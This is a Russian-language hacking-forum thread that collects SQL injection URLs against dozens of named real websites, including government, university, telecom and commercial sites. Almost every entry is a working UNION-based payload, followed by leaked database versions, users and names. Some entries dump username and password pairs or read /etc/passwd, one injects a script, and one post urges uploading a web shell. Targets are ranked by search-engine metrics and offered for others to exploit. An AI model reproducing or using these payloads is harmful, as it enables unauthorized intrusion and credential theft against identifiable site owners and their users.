SQL Инъекции

http://ipsnorthamerica.net/news.php?idnews=2694+and+1=0+union+select+1,2,3,4,concat_ws(char(32,58,32),user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15

PR-6

 

Code:

http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,12,3,4+--+

Version: 4.1.22-standard-log
Database: student_SWC
User: student_user@localhost
PR - 1
ТИЦ - 10
Вот юзеры:

Code:

http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x3a,password%29,2,3,4+from+jos_users--

Только в админку доступа нет, идет редирект на морду.

 

Code:

http://www.crie.min-edu.pt/index.php?section=162-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14--

PR 7
вывод сверху
version - 4.1.22
user - mde@localhost
database - mde

Code:

http://www.hbtheusden.nl/Content/base.php?ID=10-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

PR 4
вывод тоже сверху
version - 5.0.67
user - hbvt_hbvt@localhost
database - hbvt_Hbt

P.S. Мой первый скуль в паблике и надеюсь не байанный и не последний...

 

PR 5

Code:

http://www.readingmatters.co.uk/book2.php?id=-235+union+select+1,concat_ws%280x3a,version%28%29,database%20%28%29,user%28%29%29,3,4,5,6,7,8,9%20--

version : 5.0.67-community-log
database : readingmatters
user: davidmarshall@localhost

 

pechory.library.ru
PR - 8
ТиЦ - 5400

MySQL 4.1.20

LOAD FILE:

Code:

http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10+from+mysql.user+--

с ковычками проблем нет)
---------------------------------------------------------
Sql Inj XSS:

Code:

http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,'<script>alert();</script>',7,8,9,10+from+mysql.user+--  

---------------------------------------------------------
all:

Code:

http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,6,group_concat(0x0b,user,0x3a,password,0x3a,host,0x3a,file_priv),8,9,concat_ws(0x3a,@@version_compile_os,0x3a,user(),0x3a,version(),0x3a,database())+from+mysql.user+--

Вам осталось только раскрыть пути и залить шелл=)

 

http://www.adaderana.lk/show.php?prid=-4+UNION+SELECT+concat_ws(user(),version(),database())--

вывод в названии картинки
PR4

http://www.anca.org/press_releases/press_releases.php?prid=-999.9+UNION+SELECT+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

тиц 50 pr 6

 

http://www.mordauntshort.com/press_releases.php?PRID=7

7 AND %тут выражение%
Current DB: mordauntshort2007
Tables: ms_admin
id: 1
username: ChrisSoutham
password:

ТИЦ70(R3) PR4

 

Сборочка

accordsalud.com.ar pr 3

Code:

http://www.accordsalud.com.ar/php/turismo/destinos/alojamientos.php?id=34-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--

version - 5.1.3.8-community
user - up@localhost
database - accord_salud

vvaltena.nl тиц 10 pr 2

Code:

http://www.vvaltena.nl/default.php?id=47-999.9+union+select+1,concat_ws(user(),version(),database()),3--

version - 5.1.47
user - [email protected]
database - vvaltena

newmexicocreates.org pr 5

Code:

http://newmexicocreates.org/artists.php?id=1146-999.9+union+select+1,2,3,concat_ws(user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--

version - 4.1.22
user - [email protected]
database - mnmfdb

pustin2000.ru pr 2

Code:

http://www.pustin2000.ru/material.php?id=7-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9--

version - 4.1.25
user - pustin20@localhost
database - wwwpustin2000ru

polymery.ru тиц 60 pr 4

Code:

http://www.polymery.ru/material.php?id=3-999.9+union+select+1,concat_ws(user(),version(),database()),3--

version - 5.0.88
user - [email protected]
database - u44790

worldmusicinstitute.org тиц 10 pr 4

Code:

http://www.worldmusicinstitute.org/event.php?id=906-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--

version - 4.1.25-Debian_mt1-log
user - [email protected]
database - worldmusicinstitute_org_-_ucms

klimt02.net pr 5

Code:

http://www.klimt02.net/jewellers/index.php?item_id=11203-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),version(),database()),8--

version - 5.0.67-community
user - klimt03_01@localhost
database - klimt03_01

thermos-russia.ru 20 тиц , pr 2

Code:

http://www.thermos-russia.ru/showimg.php?id=68-999.9+union+select+1,2,3,4,5,6,7,concat_ws(user(),version(),database()),9,10,11,12--

version - 4.0.26
user - [email protected]
database - thermo

futureevents.ru тиц 20

Code:

http://www.futureevents.ru/event.php?id=86-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7--

version - 5.0.45-community
user - ntsison@localhost
database - sison


cosplay.compgamer.com pr 3

Code:

http://cosplay.compgamer.com/readnews.php?id=4848-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--

version - 5.0.45-log
user - compgamer_com@localhost
database - compgamer_com_2

P.S. Всё тщательно проверял на бойанность,но если где-то пропустил,извиняйте!

 

http://www.wordsfromreuben.com/2009/songs.php?rid=17+union+select+1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7

PR-4

 

РЕЧФЛОТ

http://www.rechflot.ru/page/static.php?pn=-21+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4+--


version : 5.0.67-log
user : [email protected]
database : :h2rechf_rechflot
os : portbld-freebsd6.2

таблица users

/admin/...

 

http://hodi.org.zm/index.php?sid=1925+and+substring(version(),1,1)=4

 

Code:

http://www.agribid.de/faq.pl?cat=16-999.9+union+select+1,concat_ws(user(),version(),database())--

PR 4
version - 5.0.67
user - agribidde@localhost
database - agribid

 

http://info.web.lehigh.edu/EI/story.php?id=-5+union+select+1,2,3,4,5,6,group_concat(0x0b,user_name,0x3a,password),8+from+users--

PR4

http://www.woolstoneyes.co.uk/newsletter-story.php?id=-5+union+select+1,group_concat(0x0b,username,0x3a,password),3,4,5+from+users--

PR6

http://www.sussex.edu/news/story.php?id=-5+union+select+1,2,group_concat(0x0b,table_name)+from+information_schema.tables--

PR4

http://www.freechineselessons.com/story.php?id=-5+union+select+1,2,3,group_concat(0x0b,table_name),5+from+information_schema.tables--

PR4

http://www.rivervalleystampclub.org/story.php?id=-5+union+select+1,2,group_concat(0x0b,table_name),4,5,6,7+from+information_schema.tables--

 

МегаФон.ru

Code:

http://volga.zamenigoodok.megafon.ru/modal/rbt_properties/rbtId/38878/rbtCode/-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8+--+

user - [email protected]
database - mgf
version - 5.1.42

А так же на многих остальных, где есть "Замени Гудок", посмотреть можно тут

Code:

http://www.megafon.ru/f/ru/gudok/index.html

 

http://www.fmnplc.com/news_details.php?recordID=-2046+union+select+1,aes_decrypt(aes_encrypt(group_concat(user,char(58),password),1),1),3,4+from+mysql.user--

http://www.fmnplc.com/myadmin/

http://www.fmnplc.com/news_details.php?recordID=-2046+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),1),1),3,4+from+users--

http://www.fmnplc.com/cms/

 

boulogne-developpement.com пр5

Code:

http://www.boulogne-developpement.com/parcs2.php?id=49+unIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12+--+

odno.nat.tn пр3

Code:

http://www.odno.nat.tn/fr/index.php?id=-9+union+select+1,2,3,4,5,6,7+--+

intermobili.com

Code:

http://www.intermobili.com/ita/popfoto.php?inmod=acan&inseq=-40+union+select+version(),2,3,4,5+--+

topalberghi.com пр2

Code:

http://www.topalberghi.com/popfoto.php?id=-4+uNIon+sELEct+1,2,concat_ws(0x3a3a,id,email,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+admin+--+&num=1

tourisme-montreuillois.com пр5

Code:

http://www.tourisme-montreuillois.com/loger_details.php?id=-6+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+&type=2&classement=2

e-bcsystems.com

Code:

http://www.e-bcsystems.com/docDown.php?id=-13+union+select+1,2,concat_ws(0x3a3a,email,password),4,5,6,7,8,9,10,11+from+users+--+

pilotimmobilier.com пр3

Code:

http://www.pilotimmobilier.com/site/_Conseil_immobilier_/General.php?rech=2&rub=-5+UniOn+SEleCt+unhex(hex(user()))+--+

vsvgroup.ru пр3 тиц 30

Code:

http://www.vsvgroup.ru/catalog.php?type=-15+union+select+1,2,3,4,concat_ws(0x3a3a,login,pass),6,7+from+users+--+&maintext=true

privcams.com пр4 AlexRank 263929

Code:

http://www.privcams.com/film.php?Lp=99999'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+group+by+table_schema+limit+1,1+--+

e-sexspiele.com пр3

Code:

http://www.e-sexspiele.com/Vip/Erotikspiele_3D.php?Lp=-7'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+group+by+'+union+select+1,2,3,4,5,6+--+

babeblvd.com пр3 Alex Rank 343490

Code:

http://www.babeblvd.com/videos/player.php?id=89&v=54'+union+select+1,2,3,4,5,6+--+

bobbystube.com пр2 Alex Rank 12377

Code:

http://www.bobbystube.com/videos/player.php?id=-21226+union+select+1,concat_ws(0x3a3a,id,username,password),3,4,5,6+from+tps_users+--+&from=c

wooltube.com пр2 Alex Rank 96986

Code:

http://www.wooltube.com/videos/player.php?id=-23230+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+--+&from=c

iclipart.com пр6 Alex Rank 21004

Code:

http://www.iclipart.com/download.php?iid=-197506'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,table_name,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114+from+information_schema.tables+--+&submit=&keys=spring&notkeys=&start=0&andor=AND&c1=&c2=&s1=&s2=&release1=&release2=&previewcheck=&cat=All&type=&rows=5&jump=0&period=&collection=&group=&tl=photos&adv=

brushcountrymonsters.com

Code:

http://www.brushcountrymonsters.com/videos/player.php?id=-5'+uNIoN+sELeCT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+infOrmAtion_schEmA.tAblEs+group+by+table_Schema+limit+1,1+--+

parissud130.org

Code:

http://www.parissud130.org/videos/desc_videos.php?vid=-435+union+select+1,2,3,4+--+

hunt8.com Alex Rank 2322

Code:

http://www.hunt8.com/videos/player.php?id=-186779+union+select+1,concat_ws(0x3a3a,id,username,password),3,4,5,6+from+tps_users+--+&from=a

fulltubemovies.com Alex Rank 1494

Code:

http://fulltubemovies.com/videos/player.php?id=-186779+union+select+1,table_name,3,4,5,6+from+information_schema.tables+limit+160,300+--+&from=a

 

Сборочка №2 by ~d0s~

laemmle.com pr 6 тиц 10

Code:

http://www.laemmle.com/viewmovie.php?mid=5116-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--

notamusica.com pr 2

Code:

http://www.notamusica.com/index.php?id=11-999.9+union+select+1,2,3,4,5,6,7,concat_ws(version(),user(),database()),9,10--

tandem-org.de pr 6 тиц 10

Code:

http://www.tandem-org.de/start.php?seite_id=202-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

cafejos.org pr 1

Code:

http://www.cafejos.org/profileview.php?pr=28-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7--

teamcompany.com pr 3

Code:

http://www.teamcompany.com/eng/imglb.php?img=27-999.9+union+select+1,2,3,4,5,6,7,8,9,concat_ws(user(),version(),database()),11--

roughtrax4x4.com pr 2

Code:

http://www.roughtrax4x4.com/index.php?doc=87-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11--

nepaltrekplan.com pr 1

Code:

http://www.nepaltrekplan.com/page.php?q=3-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9--

difchihuahua.gob.mx pr 1

Code:

http://www.difchihuahua.gob.mx/nota.php?sec=5%26id=25-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5--

losinformantes.com.mx pr 1

Code:

http://www.losinformantes.com.mx/Nota.php?sec=186-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5--

reachdevelopment.com тиц 10 pr 3

Code:

http://reachdevelopment.com/about/press/article.php?pr=150-999.9+union+select+1,2,3,concat_ws(user(),version(),database()),5,6,7--

indarsun.com pr 3

Code:

http://www.indarsun.com/_bin/ficha_noticia.php?mid=43-999.9+union+select+1,2,concat_ws(user(%20%20),version(),database()),4,5,6--

P.S. Нигде ничего извлеч не пытался,выкладывал для вас,так что все в ваших руках.

P.S.S. Вывод не всегда на видном месте,где-то в титле,где-то в исходном коде,смотрим внимательно!

P.S.S.S Ждем сборочку №3 cегодня вечером или завтра днем!

 

Code:

http://www.tutpricol.ru/message.php?id=-115+union+select+1,concat_ws%280x3a,version%28%29,database%20%28%29,user%28%29%29,3,4,5,6,7%20--

version : 4.1.25-log
database : tutpric5_tutpricol
user : tutpric5_root@localhost

Code:

http://zoo.kurgan.ru/informs.php?id=-99+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables --

version : 5.0.70
user : spivak3@localhost
database : spivak3

Code:

http://www.petazon.com/showcompany.php?id=-11177+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,TABLE_NAME,54,55,56,57,58,59,60,61,62+from+INFORMATION_SCHEMA.TABLES+limit+0,1%20--

version : 5.0.89-community-log
user : petazon_pet@localhost
database : petazon_pet

 

Министерство транспорта Уганды

http://www.works.go.ug/news_details.php?id=-5+union+select+group_concat(0x0b,table_name),2+from+information_schema.tables--

PR5

http://www.glassbox.tv/news/news_details.php?id=-5+union+select+1,group_concat(0x0b,table_name),3,4+from+information_schema.tables--

http://www.abmsoft.de/news_details.php?id=-5+union+select+1,2,3,group_concat(0x0b,username,0x3a,pw,0x3a,id),5+from+abm_login--

 

http://www.rn-inform.ru/index.php?id=7+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+limit+1,1


Database Version: 5.0.45
Database name: roilsoft
User name: roilsoft@localhost
Os:suse-linux